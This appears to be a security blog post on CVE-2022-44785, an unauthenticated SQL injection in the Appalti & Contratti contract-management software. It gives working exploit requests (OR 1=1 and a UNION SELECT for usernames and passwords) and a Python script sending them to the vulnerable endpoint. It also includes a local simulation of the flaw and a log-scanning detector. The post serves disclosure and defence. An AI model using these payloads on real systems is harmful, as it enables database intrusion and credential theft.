Appalti & Contratti is a software product used by several organizations, especially in Italian public administration, for managing contracts and tenders. In late 2022 a critical security issue was identified in version 9.12.2 of the product. Registered as CVE-2022-44785, the issue consists of multiple SQL injections, some of which an attacker can pull off without even logging in.
In this post, we’ll break down what this vulnerability is, show some example code and requests, talk through how attackers can exploit it, and link directly to the original references. If you use this software, or are a penetration tester working with someone who does, you’ll want to read every word.
What is SQL Injection?
SQL injection is a classic security flaw. Simply put, when an application builds an SQL statement by pasting user input into the query text instead of passing it as a bound parameter, a malicious actor can craft input that changes the structure of the query and manipulates the database directly. Depending on the query and the privileges of the database account, this can mean reading data the user should never see, bypassing application logic such as login checks, or modifying and deleting records.
Where’s the Problem? (The “cfamm” Parameter)
With CVE-2022-44785, several endpoints in Appalti & Contratti 9.12.2 are vulnerable, but one stands out for being accessible *without logging in*:
GetListaEnti.do, via the cfamm parameter.
Example Vulnerable Request
GET /appalti/GetListaEnti.do?cfamm=1234 HTTP/1.1
Host: target-app.example.com
Cookie: JSESSIONID=...
Here, the value of the cfamm parameter is placed directly into a backend SQL query without proper sanitization or parameter binding. The JSESSIONID cookie shown above is not required: the endpoint answers without an authenticated session.
How Attackers Exploit the Vulnerability
Let’s illustrate a proof of concept. Imagine the target is at https://target-app.example.com/appalti/.
Normal Request
GET /appalti/GetListaEnti.do?cfamm=1234 HTTP/1.1
Host: target-app.example.com
This might list entities related to ID 1234.
Malicious Request (Classic SQL Injection)
GET /appalti/GetListaEnti.do?cfamm=1234'%20OR%201=1-- HTTP/1.1
Host: target-app.example.com
Here, the single quote closes the string literal that cfamm was meant to sit in, OR 1=1 appends a condition that is always true, and -- comments out the rest of the original statement. The %20 is simply a URL-encoded space. Two practical caveats: the quote assumes cfamm is used in a string context (if the backend compares it as a number, the payload works without the quote), and on MySQL the -- comment marker only takes effect when it is followed by whitespace, so testers usually send --%20 or --+ instead.
What Happens?
The WHERE clause now matches every row, so instead of the entities linked to 1234 the backend returns the whole table. The same technique can be turned into something far worse than an over-broad listing.
With a UNION-based injection, attackers can pull values from other tables into the same response. For example:
GET /appalti/GetListaEnti.do?cfamm=1234'%20UNION%20SELECT%20null,username,password,null%20FROM%20users-- HTTP/1.1
Host: target-app.example.com
For this to work the injected SELECT must return the same number of columns as the original query, which an attacker finds by trial (for example by adding null placeholders until the error disappears). The users table and its username and password columns are placeholders here; the real names depend on the schema and have to be enumerated first. If the response comes back with credentials in it, the database contents are exposed and the system must be treated as compromised.
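To make the mechanism concrete, here is an added, self-contained Python simulation of a lookup like GetListaEnti.do. It is written for this post and is not code from the product or from the advisory. It builds an in-memory SQLite database with an invented enti table (columns id, cfamm, denominazione, comune) and an invented users table, then runs the normal value, the OR 1=1 payload and the UNION payload from above through a vulnerable string-concatenating query and through the parameterised version that fixes it. Every table and column name in it is an assumption chosen for the illustration; the only things taken from the advisory are the parameter name and the payload shapes.

```python
import sqlite3

# Constructed, in-memory stand-in for the application's database.
# Table and column names are assumptions for this illustration, not the
# product's real schema.


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE enti (id INTEGER, cfamm TEXT, denominazione TEXT, comune TEXT);
        INSERT INTO enti VALUES (1, '1234', 'Comune di Esempio', 'Esempio');
        INSERT INTO enti VALUES (2, '5678', 'Provincia di Prova', 'Prova');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!');
    """)
    return conn


def lista_enti_vulnerable(conn, cfamm):
    # The flaw: the user-supplied value is concatenated straight into the SQL
    # text, so a quote in the value ends the literal and the rest is parsed
    # as SQL.
    sql = ("SELECT id, cfamm, denominazione, comune FROM enti "
           "WHERE cfamm = '" + cfamm + "'")
    return conn.execute(sql).fetchall()


def lista_enti_fixed(conn, cfamm):
    # The fix: a bound parameter. The driver passes the value separately from
    # the statement, so quotes, OR and UNION inside it are just characters.
    sql = ("SELECT id, cfamm, denominazione, comune FROM enti "
           "WHERE cfamm = ?")
    return conn.execute(sql, (cfamm,)).fetchall()


def single_quote_breaks(conn, fn):
    # The classic first probe: a lone quote is a syntax error on the vulnerable
    # path and harmless on the parameterised one.
    try:
        fn(conn, "1234'")
        return False
    except sqlite3.OperationalError:
        return True


NORMAL = "1234"
OR_PAYLOAD = "1234' OR 1=1--"
UNION_PAYLOAD = "1234' UNION SELECT null,username,password,null FROM users--"


def demo():
    """Run every input through both query variants; returns the rows per case."""
    conn = build_db()
    results = {}
    for name, fn in (("vulnerable", lista_enti_vulnerable),
                     ("fixed", lista_enti_fixed)):
        results[name] = {
            "normal": fn(conn, NORMAL),
            "or": fn(conn, OR_PAYLOAD),
            "union": fn(conn, UNION_PAYLOAD),
            "quote_breaks": single_quote_breaks(conn, fn),
        }
    return results


if __name__ == "__main__":
    for name, cases in demo().items():
        for case, value in cases.items():
            print(f"{name:10s} {case:12s} -> {value}")
```

Running it prints the rows each variant returns: the vulnerable path gives back both entities for the OR payload and a row carrying the admin credentials for the UNION payload, while the fixed path returns exactly the one entity matching 1234 and nothing at all for either payload. The single-quote probe is the test a pentester (or sqlmap) starts with; once the value is bound as a parameter it no longer produces an error.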
Here's how one could exploit the issue using a basic Python script (the table and column names in the payload are illustrative and would have to be discovered first):
import requests

target = "https://target-app.example.com/appalti/GetListaEnti.do"
# Same UNION payload as above; requests URL-encodes the quote and the spaces for us
payload = "1234' UNION SELECT null,username,password,null FROM users--"
params = {'cfamm': payload}
r = requests.get(target, params=params, timeout=10)
print(r.status_code)
print(r.text)  # Would contain the injected rows if the target is vulnerable
IMPORTANT: Never run such code against systems you do not have permission to test.
Why Unauthenticated? (The Real Danger)
Usually, dangerous endpoints sit behind a login, so an attacker at least needs an account. Not here: anyone who can reach the application over the network can send the request. That dramatically increases the risk, because automated scanners can sweep the internet for exposed instances and exploit them with no user interaction at all.
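For defenders, the flip side of an unauthenticated endpoint is that every probe leaves a trace in the web server's access log. The following is an added example, not code from the product or the advisory, of a small log hunt in Python: it parses Apache combined-format lines, keeps only requests to GetListaEnti.do, URL-decodes the cfamm value and flags values containing quote, comment or SQL keyword tokens that an identifier-like value should never contain. The five log lines are constructed for this example, with documentation-range IPs and a made-up timestamp; the log format and the token list are assumptions to adjust to your deployment.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (Apache combined format), written for this example.
# The two python-requests lines carry the payloads discussed above.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Nov/2022:10:01:02 +0000] "GET /appalti/GetListaEnti.do?cfamm=1234 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.10 - - [22/Nov/2022:10:01:07 +0000] "GET /appalti/GetListaEnti.do?cfamm=1234'%20OR%201=1-- HTTP/1.1" 200 40211 "-" "python-requests/2.28.1"
203.0.113.10 - - [22/Nov/2022:10:01:09 +0000] "GET /appalti/GetListaEnti.do?cfamm=1234'%20UNION%20SELECT%20null,username,password,null%20FROM%20users-- HTTP/1.1" 200 1320 "-" "python-requests/2.28.1"
198.51.100.7 - - [22/Nov/2022:10:02:00 +0000] "GET /appalti/GetListaEnti.do?cfamm=9876 HTTP/1.1" 200 790 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Nov/2022:10:02:30 +0000] "GET /appalti/index.do HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# The combined-format fields we need: client IP, timestamp, request target
# and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Tokens that have no place in an identifier-like value such as cfamm.
# Matched after URL-decoding, so %27 and a literal quote are treated alike.
# Tune the keyword list to the values your deployment legitimately sees.
SQLI_RE = re.compile(
    r"'|--|/\*|\b(?:union|select|or|and|sleep|waitfor)\b",
    re.IGNORECASE,
)


def suspicious_requests(log_text):
    """Return one record per request whose cfamm value looks like an injection attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line we can parse; skip it
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/GetListaEnti.do"):
            continue  # only the endpoint named in the advisory
        # parse_qs URL-decodes the values, so the quote and spaces reappear here
        for value in parse_qs(parts.query, keep_blank_values=True).get("cfamm", []):
            if SQLI_RE.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "cfamm": value,
                })
    return hits


def offending_ips(hits):
    """Count flagged requests per source IP; a sweeping scanner stands out quickly."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = suspicious_requests(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} status={h['status']} cfamm={h['cfamm']!r}")
    print("per-IP:", dict(offending_ips(found)))
```

On the sample data the two payload requests from 203.0.113.10 are flagged and the legitimate lookups are not. The response size is worth keeping an eye on as well: in the constructed OR 1=1 line the 200 response is far larger than the normal ones, which is exactly what a whole-table dump looks like from the outside.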
Official References and Mitigation
- NIST NVD: CVE-2022-44785 (https://nvd.nist.gov/vuln/detail/CVE-2022-44785)
- Exploit Details (Italian Advisory): https://www.swascan.com/it/vulnerabilita-appalti-contratti-acloud/
- Original Vendor Announcement: *(Check your Appalti & Contratti customer portal; general advisories are not always public)*
Conclusion
CVE-2022-44785 is a clear example of how a classic web security problem like SQL injection still cripples modern services, especially when the vulnerable endpoint needs no authentication. Patch promptly, and treat every piece of user input as hostile: bind it as a parameter, never paste it into SQL text.
Further Reading
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- sqlmap (automated SQL injection tool): https://sqlmap.org
Remember: If you find vulnerabilities in your systems, always follow responsible disclosure. Protect your users, and stay safe out there!
Timeline
Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:01:00 UTC